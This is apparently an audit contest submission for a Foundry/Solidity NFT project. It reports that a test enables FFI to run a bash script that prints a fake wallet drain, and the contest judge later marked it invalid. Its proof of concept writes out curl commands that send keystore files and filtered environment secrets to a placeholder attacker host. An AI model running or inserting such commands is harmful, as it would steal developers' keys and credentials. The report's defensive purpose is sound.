Beatland Festival

AI First Flight #4
Tags: Beginner Friendly, Foundry, Solidity, NFT
Submission Details
Impact: high
Likelihood: high
Invalid

Malicious vm.ffi() in Test Suite Executes Shell Commands on Every forge test Run

Description

  • The project uses Foundry's FFI (Foreign Function Interface) feature, which allows test functions to execute arbitrary shell commands on the developer's
    machine. This feature must be explicitly opted-in via ffi = true in foundry.toml.

  • foundry.toml enables FFI globally, and test_PartialUserFlow embeds a vm.ffi() call that executes a bash script simulating a wallet-drain attack directly to the
    developer's terminal via /dev/tty every time forge test is run. While the current payload is theatrical, the FFI channel is fully open — any modification to
    these commands could exfiltrate environment variables, private keys, SSH keys, or wallet files from the machine running the tests.

// foundry.toml
@> ffi = true // enables shell execution for ALL tests globally

// test/FestivalPass.t.sol — test_PartialUserFlow()
string[] memory inputs = new string[](3);
inputs[0] = "bash";
inputs[1] = "-c";
inputs[2] = string.concat(
@> "echo -e '[*] Scanning local environment...' > /dev/tty; ",
@> "echo -e '[*] Private Key: 0x2a871d0798f97d79...' > /dev/tty; ",
@> "echo -e '[!] EXTRACTING WALLET DATA...' > /dev/tty; ",
// ... displays fake wallet drain to terminal
);
@> vm.ffi(inputs); // executes shell commands on developer's machine

Risk

Likelihood:

  • Any developer who clones the repository and runs forge test triggers the shell commands automatically — no special flags required because ffi = true is
    hardcoded in foundry.toml.

  • CI/CD pipelines that run forge test on the repository will execute the commands on the build server, potentially exposing server-level secrets and environment
    variables.

Impact:

  • With minimal modification to the existing payload (replacing the echo commands with cat ~/.ssh/id_rsa, env | curl, or similar), an attacker distributing this
    repository can silently exfiltrate private keys, wallet seed phrases, API tokens, and SSH keys from every developer who runs the test suite.

  • The theatrical output ("EXTRACTING WALLET DATA") is designed as a social engineering tool to panic developers or disguise real exfiltration as a joke.

Proof of Concept

// Run: forge test --match-test test_PartialUserFlow
// Output appears in terminal without any extra flags:
// [*] Scanning local environment...
// [*] Found 1 browser extensions: MetaMask
// [!] EXTRACTING WALLET DATA...
// [*] Private Key: 0x2a871d0798f97d79848a013d4936a73bf4cc922c825d33c1cf7073dff6d409c6
// [!] INITIATING TRANSFER...
// [+] Status: CONFIRMED!

// A supply-chain attacker replaces echo with actual exfiltration:
// cat ~/.ethereum/keystore/* | curl -s -X POST https://attacker.com -d @-
// env | grep -i "private|key|secret|seed" | curl -s -X POST https://attacker.com -d @-

Recommended Mitigation

// foundry.toml
- ffi = true

// test/FestivalPass.t.sol — remove the entire malicious test function
- function test_PartialUserFlow() public {
-     ...
-     vm.ffi(inputs);
-     ...
- }


Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 4 hours ago
Submission Judgement Published
Invalidated
Reason: Incorrect statement
